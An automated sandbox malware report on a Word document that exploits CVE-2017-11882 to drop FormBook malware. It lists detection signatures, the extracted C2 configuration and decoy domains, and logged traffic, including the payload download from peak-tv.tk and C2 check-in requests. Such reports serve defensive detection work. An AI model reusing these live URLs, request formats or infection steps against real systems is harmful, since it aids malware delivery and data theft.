Windows Analysis Report PO789.doc

Overview

General Information

Sample Name: PO789.doc
Analysis ID: 552782
MD5: 6c28e31d32e97db724188025636ac25e
SHA1: c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256: c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
Tags: doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.carbonfiber.cloud/md4m/"], "decoy": ["thegreenroomak.net", "boxingforfitness.info", "hynejubelured.com", "elektrocentralybenza.online", "getinteriorsolution.com", "ajctrade.ltd", "boytoyporn.com", "charlotteetlachocolaterie.fr", "martens-suomi.com", "colesfax.com", "laksmanawarehouse.com", "extraordinarymiracle.com", "hunttools.info", "ofertasdesuvsinfosmex.com", "banphimipad.com", "jingjiguanchabao.com", "keepourassets.com", "haveitmore.com", "bleuredmedia.com", "hsgerontech.com", "mms05.xyz", "994671.com", "xsbjbj.com", "syxinyu.com", "costnergroups.com", "muzicalbox.com", "kkstudy.net", "picguru.pro", "avtokitai.store", "artplay.xyz", "4-sidedirect.com", "wa1315.xyz", "pelicancrs.com", "cozastore.net", "maatia.com", "movistar.money", "clickprintus.com", "oblatz.com", "mood-room.com", "erisibu85.com", "bzhjxf.com", "mdcomfortukraine.store", "timo-music.com", "vinovai.xyz", "danielkcarter.store", "segurodevidacovid.com", "somoslaostra.com", "businessis.business", "wholisticard.com", "dummydomain234543.com", "realstakepool.com", "rs23.club", "emobilemarket.com", "mabsfuse.com", "lastra41.com", "safbilgi.com", "prestigiousuniforms.com", "outerverse.space", "formuladushi.online", "yt3013.xyz", "therestaurant.menu", "lentellas.com", "rutube.cloud", "mywhitelotus.com"]}
Multi AV Scanner detection for submitted file
Source: PO789.doc Virustotal: Detection: 57%
Source: PO789.doc ReversingLabs: Detection: 53%
Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://peak-tv.tk/medicomzx.exe Avira URL Cloud: Label: malware
Source: http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i Avira URL Cloud: Label: malware
Source: http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: peak-tv.tk Virustotal: Detection: 5%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe ReversingLabs: Detection: 51%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.medicomsh78694.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.medicomsh78694.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.medicomsh78694.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
Document contains Microsoft Equation 3.0 OLE entries
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr Stream path '_1703602930/\x1CompObj' : ...........................F....Microsoft Equation
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: peak-tv.tk
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BA28
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BAD8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BBC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BA18
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BAC8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0037BBC0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0044F2A8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop ebx 5_2_00406ABB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_0040C41C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_0041566C
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4x nop then pop edi 5_2_004156A7
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 2.58.149.41:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 91.195.240.13:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.13 80
Source: C:\Windows\explorer.exe Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 109.94.209.123 80
Source: C:\Windows\explorer.exe Domain query: www.prestigiousuniforms.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.carbonfiber.cloud/md4m/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 2.58.149.41 2.58.149.41
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Jan 2022 17:17:00 GMTServer: ApacheLast-Modified: Tue, 11 Jan 2022 16:19:34 GMTETag: "aca00-5d550d19904c2"Accept-Ranges: bytesContent-Length: 707072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Jan 2022 17:18:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 179X-Sorting-Hat-ShopId: 59690647732X-Dc: gcp-europe-west1X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd048db19b64333-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 
72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 17:18:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://led24.de/iconset/
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://p.yusukekamiyamane.com/
Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://splashyfish.com/icons/
Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
